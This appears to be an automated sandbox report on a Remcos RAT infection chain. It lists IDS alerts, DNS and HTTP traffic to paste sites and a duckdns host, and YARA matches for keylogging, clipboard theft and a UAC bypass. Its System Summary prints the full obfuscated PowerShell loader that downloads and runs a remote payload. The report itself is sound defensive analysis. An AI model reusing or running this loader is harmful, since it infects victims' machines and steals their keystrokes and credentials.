                    Source: Network traffic | Suricata IDS: 2020423 - Severity 1 - ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound : 188.114.97.3:443 -> 192.168.2.4:49736
                    Source: Network traffic | Suricata IDS: 2020425 - Severity 1 - ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound M2 : 188.114.97.3:443 -> 192.168.2.4:49736
                    Source: Network traffic | Suricata IDS: 2858295 - Severity 1 - ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain) : 188.114.97.3:443 -> 192.168.2.4:49736
                    Source: Malware configuration extractor | URLs: sost.duckdns.org
                    Source: unknown | DNS query: name: pastebin.com
                    Source: unknown | DNS query: name: paste.ee
                    Source: powershell.exe, 00000003.00000002.1886765737.0000026025ADB000.00000004.00000800.00020000.00000000.sdmp | String found in memory: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://cdnjs.cloudflare.com https://www.google.com https://www.gstatic.com https://analytics.paste.ee; img-src 'self' https://secure.gravatar.com https://analytics.paste.ee data:; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://cdnjs.cloudflare.com; font-src 'self' https://themes.googleusercontent.com https://fonts.gstatic.com; frame-src https://www.google.com; object-src 'none'
                    Source: unknown | DNS query: name: sost.duckdns.org
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 127.0.0.1
                    Source: Yara match | File source: 3.2.powershell.exe.26026fe03e0.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 3.2.powershell.exe.2602596b090.1.raw.unpack, type: UNPACKEDPE
                    Source: global traffic | TCP traffic: 192.168.2.4:49741 -> 181.236.112.169:2001
                    Source: global traffic | HTTP traffic detected: GET /raw/4B83LcVU HTTP/1.1; Host: pastebin.com; Connection: Keep-Alive
                    Source: global traffic | HTTP traffic detected: GET /shqm6g9p/raw HTTP/1.1; Host: rentry.org; Connection: Keep-Alive
                    Source: global traffic | HTTP traffic detected: GET /d/Rrk2f/0 HTTP/1.1; Host: paste.ee; Connection: Keep-Alive
                    Source: Joe Sandbox View | IP Address: 104.20.3.235
                    Source: Joe Sandbox View | IP Address: 164.132.58.105
                    Source: Joe Sandbox View | IP Address: 188.114.97.3
                    Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
                    Source: Joe Sandbox View | ASN Name: COLOMBIATELECOMUNICACIONESSAESPCO
                    Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                    Source: Network traffic | Suricata IDS: 2841075 - Severity 1 - ETPRO MALWARE Terse Request to paste .ee - Possible Download : 192.168.2.4:49736 -> 188.114.97.3:443
                    Source: global traffic | HTTP traffic detected: GET /raw/J6uRjZrv HTTP/1.1; User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682; Host: pastebin.com; Connection: Keep-Alive
                    Source: global traffic | HTTP traffic detected: GET /vsm4ofxs/raw HTTP/1.1; User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682; Host: rentry.org; Connection: Keep-Alive
                    Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 8_2_00404B96 WaitForSingleObject,SetEvent,recv
                    Source: global traffic | DNS traffic detected: DNS query: pastebin.com
                    Source: global traffic | DNS traffic detected: DNS query: rentry.org
                    Source: global traffic | DNS traffic detected: DNS query: paste.ee
                    Source: global traffic | DNS traffic detected: DNS query: sost.duckdns.org
                    Source: powershell.exe, 00000003.00000002.1886765737.0000026025AD5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: HTTPS://PASTE.EE/D/RRK2F/0
                    Source: AddInProcess32.exe | String found in binary or memory: http://geoplugin.net/json.gp
                    Source: powershell.exe, 00000003.00000002.1927741950.0000026035520000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1927741950.0000026035581000.00000004.00000800.00020000.00000000.sdmp, AddInProcess32.exe, 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: http://geoplugin.net/json.gp/C
                    Source: powershell.exe, 00000003.00000002.1927741950.0000026035581000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1786360295.00000201819E4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1798573819.00000201901B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1798573819.0000020190072000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
                    Source: powershell.exe, 00000003.00000002.1886765737.0000026025AD5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://paste.ee
                    Source: powershell.exe, 00000003.00000002.1886765737.0000026026B34000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1886765737.00000260271BB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pastebin.com
                    Source: powershell.exe, 00000006.00000002.1786360295.000002018022D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
                    Source: powershell.exe, 00000003.00000002.1886765737.0000026027222000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1786360295.0000020181950000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://rentry.org
                    Source: powershell.exe, 00000001.00000002.1956266519.000002238A811000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1886765737.0000026025511000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1786360295.0000020180001000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: powershell.exe, 00000006.00000002.1803498782.00000201EA48A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.o
                    Source: powershell.exe, 00000006.00000002.1786360295.000002018022D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                    Source: powershell.exe, 00000001.00000002.1956266519.000002238A865000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore6
                    Source: powershell.exe, 00000001.00000002.1956266519.000002238A87B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1886765737.0000026025511000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1786360295.0000020180001000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
                    Source: powershell.exe, 00000003.00000002.1886765737.0000026025ADB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://analytics.paste.ee
                    Source: powershell.exe, 00000003.00000002.1886765737.0000026025ADB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://analytics.paste.ee;
                    Source: powershell.exe, 00000003.00000002.1886765737.0000026025ADB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdnjs.cloudflare.com
                    Source: powershell.exe, 00000003.00000002.1886765737.0000026025ADB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdnjs.cloudflare.com;
                    Source: powershell.exe, 00000006.00000002.1798573819.0000020190072000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
                    Source: powershell.exe, 00000006.00000002.1798573819.0000020190072000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
                    Source: powershell.exe, 00000006.00000002.1798573819.0000020190072000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
                    Source: powershell.exe, 00000003.00000002.1886765737.0000026025ADB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://fonts.googleapis.com
                    Source: powershell.exe, 00000003.00000002.1886765737.0000026025ADB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://fonts.gstatic.com;
                    Source: powershell.exe, 00000006.00000002.1786360295.000002018022D000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
                    Source: powershell.exe, 00000003.00000002.1886765737.00000260265B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1786360295.0000020181474000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://go.micro
                    Source: powershell.exe, 00000003.00000002.1927741950.0000026035581000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1786360295.00000201819E4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1798573819.00000201901B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1798573819.0000020190072000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
                    Source: powershell.exe, 00000003.00000002.1886765737.0000026025AD5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://paste.ee
                    Source: powershell.exe, 00000003.00000002.1886765737.0000026025AD5000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://paste.ee/d/Rrk2f/0
                    Source: powershell.exe, 00000003.00000002.1886765737.000002602716A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1886765737.00000260265B4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1886765737.00000260258D8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://pastebin.com
                    Source: powershell.exe, 00000003.00000002.1886765737.000002602716A000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://pastebin.com/raw
                    Source: powershell.exe, 00000003.00000002.1886765737.000002602716A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1886765737.00000260258D8000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://pastebin.com/raw/4B83LcVU
                    Source: powershell.exe, 00000003.00000002.1885223131.0000026023A98000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1947421542.000002603DC62000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1886411782.0000026023CA5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://pastebin.com/raw/J6uRjZrv
                    Source: powershell.exe, 00000003.00000002.1886765737.0000026027222000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1886765737.0000026025A8E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.1786360295.0000020181474000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://rentry.org
                    Source: powershell.exe, 00000003.00000002.1886765737.0000026027222000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1886765737.0000026027201000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1886765737.0000026025A8E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://rentry.org/shqm6g9p/raw
                    Source: powershell.exe, 00000003.00000002.1886765737.0000026027222000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://rentry.org/shqm6g9p/rawP
                    Source: powershell.exe, 00000006.00000002.1786360295.0000020181474000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://rentry.org/vsm4ofxs/raw
                    Source: powershell.exe, 00000006.00000002.1786360295.0000020181474000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://rentry.org/vsm4ofxs/rawp
                    Source: powershell.exe, 00000003.00000002.1886765737.0000026025ADB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://secure.gravatar.com
                    Source: powershell.exe, 00000003.00000002.1886765737.0000026025ADB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://themes.googleusercontent.com
                    Source: powershell.exe, 00000003.00000002.1886765737.0000026025ADB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com
                    Source: powershell.exe, 00000003.00000002.1886765737.0000026025ADB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com;
                    Source: powershell.exe, 00000003.00000002.1886765737.0000026025ADB000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.gstatic.com
                    Source: unknown | Network traffic detected: HTTP traffic on port 49733 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49733
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49732
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49731
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49730
                    Source: unknown | Network traffic detected: HTTP traffic on port 49731 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 49732 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 49730 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 49736 -> 443
                    Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49736
                    Source: unknown | HTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.4:49730 version: TLS 1.2
                    Source: unknown | HTTPS traffic detected: 164.132.58.105:443 -> 192.168.2.4:49731 version: TLS 1.2
                    Source: unknown | HTTPS traffic detected: 164.132.58.105:443 -> 192.168.2.4:49733 version: TLS 1.2
                    Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49736 version: TLS 1.2

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 8_2_0040A2F3 SetWindowsHookExA 0000000D,0040A2DF,00000000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Windows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 8_2_0040B749 OpenClipboard,GetClipboardData,CloseClipboard
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 8_2_004168FC OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 8_2_0040A41B GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx
                    Source: Yara match | File source: 8.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 8.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 3.2.powershell.exe.260356ab680.4.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 3.2.powershell.exe.260356ab680.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000003.00000002.1927741950.0000026035520000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000003.00000002.1927741950.0000026035581000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: powershell.exe PID: 980, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: AddInProcess32.exe PID: 7372, type: MEMORYSTR

                    E-Banking Fraud

                    Source: Yara match | File source: 8.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 8.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 3.2.powershell.exe.260356ab680.4.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 3.2.powershell.exe.260356ab680.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 00000008.00000002.2961914920.0000000002C1E000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000008.00000002.2961016698.0000000000F38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000003.00000002.1927741950.0000026035520000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000003.00000002.1927741950.0000026035581000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: powershell.exe PID: 980, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: AddInProcess32.exe PID: 7372, type: MEMORYSTR
                    Source: Yara match | File source: C:\ProgramData\remcos\logs.dat, type: DROPPED

                    Spam, unwanted Advertisements and Ransom Demands

                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 8_2_0041CA6D SystemParametersInfoW
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 8_2_0041CA73 SystemParametersInfoW

                    System Summary

                    Source: 8.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 8.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
                    Source: 8.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 8.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 8.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
                    Source: 8.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 3.2.powershell.exe.260356ab680.4.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 3.2.powershell.exe.260356ab680.4.unpack, type: UNPACKEDPE | Matched rule: REMCOS_RAT_variants Author: unknown
                    Source: 3.2.powershell.exe.260356ab680.4.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 3.2.powershell.exe.260356ab680.4.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 3.2.powershell.exe.260356ab680.4.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 3.2.powershell.exe.26026fe03e0.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables (downloaders) containing reversed URLs to raw contents of a paste Author: ditekSHen
                    Source: 3.2.powershell.exe.26026fe03e0.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detects known downloader agent Author: ditekSHen
                    Source: 3.2.powershell.exe.2602596b090.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables (downloaders) containing reversed URLs to raw contents of a paste Author: ditekSHen
                    Source: 3.2.powershell.exe.2602596b090.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects known downloader agent Author: ditekSHen
                    Source: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: REMCOS_RAT_variants Author: unknown
                    Source: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                    Source: 00000003.00000002.1927741950.0000026035520000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: 00000003.00000002.1927741950.0000026035581000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: Process Memory Space: powershell.exe PID: 3548, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                    Source: Process Memory Space: powershell.exe PID: 980, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: Process Memory Space: powershell.exe PID: 980, type: MEMORYSTR | Matched rule: Detects Invoke-Mimikatz String Author: Florian Roth
                    Source: Process Memory Space: powershell.exe PID: 980, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                    Source: Process Memory Space: AddInProcess32.exe PID: 7372, type: MEMORYSTR | Matched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                    Source: C:\Windows\System32\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?HI?dgBp?GM?ZQBQ?G8?aQBu?HQ?TQBh?G4?YQBn?GU?cgBd?Do?OgBT?GU?YwB1?HI?aQB0?Hk?U?By?G8?d?Bv?GM?bwBs?C??PQ?g?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?V?B5?H??ZQBd?Do?OgBU?Gw?cw?x?DI?Ow?k?EM?QwBS?Gg?bQ?g?D0?I??n?Gg?d?B0?H??cw?6?C8?LwBw?GE?cwB0?GU?YgBp?G4?LgBj?G8?bQ?v?HI?YQB3?C8?Sg?2?HU?UgBq?Fo?cgB2?Cc?I??7?CQ?Zg?g?D0?I??o?Fs?UwB5?HM?d?Bl?G0?LgBJ?E8?LgBQ?GE?d?Bo?F0?Og?6?Ec?ZQB0?FQ?ZQBt?H??U?Bh?HQ?a??o?Ck?I??r?C??JwBk?Gw?b??w?DE?LgB0?Hg?d??n?Ck?I??7?Ek?bgB2?G8?awBl?C0?VwBl?GI?UgBl?HE?dQBl?HM?d??g?C0?VQBS?Ek?I??k?EM?QwBS?Gg?bQ?g?C0?TwB1?HQ?RgBp?Gw?ZQ?g?CQ?Zg?g?C0?VQBz?GU?QgBh?HM?aQBj?F??YQBy?HM?aQBu?Gc?I??7?GM?bQBk?C4?ZQB4?GU?I??v?GM?I??7?H??aQBu?Gc?I??x?DI?Nw?u?D??Lg?w?C4?MQ?g?Ds?c?Bv?Hc?ZQBy?HM?a?Bl?Gw?b??u?GU?e?Bl?C??LQBj?G8?bQBt?GE?bgBk?C??ew?k?GY?I??9?C??K?Bb?FM?eQBz?HQ?ZQBt?C4?SQBP?C4?U?Bh?HQ?a?Bd?Do?OgBH?GU?d?BU?GU?bQBw?F??YQB0?Gg?K??p?C??Kw?g?Cc?Z?Bs?Gw?M??x?C4?d?B4?HQ?Jw?p?C??Ow?k?FE?U?B0?GE?dg?g?D0?I??o?C??RwBl?HQ?LQBD?G8?bgB0?GU?bgB0?C??LQBQ?GE?d?Bo?C??J?Bm?C??KQ?g?Ds?SQBu?HY?bwBr?GU?LQBX?GU?YgBS?GU?cQB1?GU?cwB0?C??LQBV?FI?SQ?g?CQ?UQBQ?HQ?YQB2?C??LQBP?HU?d?BG?Gk?b?Bl?C??J?Bm?C??LQBV?HM?ZQBC?GE?cwBp?GM?U?Bh?HI?cwBp?G4?ZwB9?C??Ow?k?FE?U?B0?GE?dg?g?D0?I??o?C??RwBl?HQ?LQBD?G8?bgB0?GU?bgB0?C??LQBQ?GE?d?Bo?C??J?Bm?C??KQ?g?Ds?J?Bq?GQ?YgBm?Gs?I??9?C??Jw?w?Cc?I??7?CQ?ZQB2?G8?bQBu?C??PQ?g?Cc?JQBK?Gs?UQBh?HM?R?Bm?Gc?cgBU?Gc?JQ?n?C??OwBb?EI?eQB0?GU?WwBd?F0?I??k?GQ?d?B2?GU?Yg?g?D0?I?Bb?HM?eQBz?HQ?ZQBt?C4?QwBv?G4?dgBl?HI?d?Bd?Do?OgBG?HI?bwBt?EI?YQBz?GU?Ng?0?FM?d?By?Gk?bgBn?Cg?I??k?FE?U?B0?GE?dg?u?HI?ZQBw?Gw?YQBj?GU?K??n?CQ?J??n?Cw?JwBB?Cc?KQ?g?Ck?I??7?Fs?UwB5?HM?d?Bl?G0?LgBB?H??c?BE?G8?bQBh?Gk?bgBd?Do?OgBD?HU?cgBy?GU?bgB0?EQ?bwBt?GE?aQBu?C4?T?Bv?GE?Z??o?CQ?Z?B0?HY?ZQBi?Ck?LgBH?GU?d?BU?Hk?c?Bl?Cg?JwBU?GU?a
?B1?Gw?YwBo?GU?cwBY?Hg?W?B4?Hg?LgBD?Gw?YQBz?HM?MQ?n?Ck?LgBH?GU?d?BN?GU?d?Bo?G8?Z??o?Cc?TQBz?HE?QgBJ?GI?WQ?n?Ck?LgBJ?G4?dgBv?Gs?ZQ?o?CQ?bgB1?Gw?b??s?C??WwBv?GI?agBl?GM?d?Bb?F0?XQ?g?Cg?Jw?w?C8?Zg?y?Gs?cgBS?C8?Z??v?GU?ZQ?u?GU?d?Bz?GE?c??v?C8?OgBz?H??d?B0?Gg?Jw?g?Cw?I??k?GU?dgBv?G0?bg?g?Cw?I??n?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?Xw?t?C0?LQ?t?C0?LQ?t?Cc?L??g?CQ?agBk?GI?ZgBr?Cw?I??n?DE?Jw?s?C??JwBS?G8?Z?Bh?Cc?I??p?Ck?Ow?=';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('?','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Users\user\Desktop\asegurar.vbs');powershell $Yolopolhggobek;
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Process Stats: CPU usage > 49%
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 8_2_004167EF ExitWindowsEx,LoadLibraryA,GetProcAddress
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 3_2_00007FFD9B9840E0
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 3_2_00007FFD9BA41493
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 8_2_0043706A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 8_2_00414005
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 8_2_0043E11C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 8_2_004541D9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 8_2_004381E8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 8_2_0041F18B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 8_2_00446270
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 8_2_0043E34B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 8_2_004533AB
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 8_2_0042742E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 8_2_00437566
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 8_2_0043E5A8
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 8_2_004387F0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 8_2_0043797E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 8_2_004339D7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 8_2_0044DA49
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 8_2_00427AD7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 8_2_0041DBF3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 8_2_00427C40
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe | Code function: 8_2_00437DB3
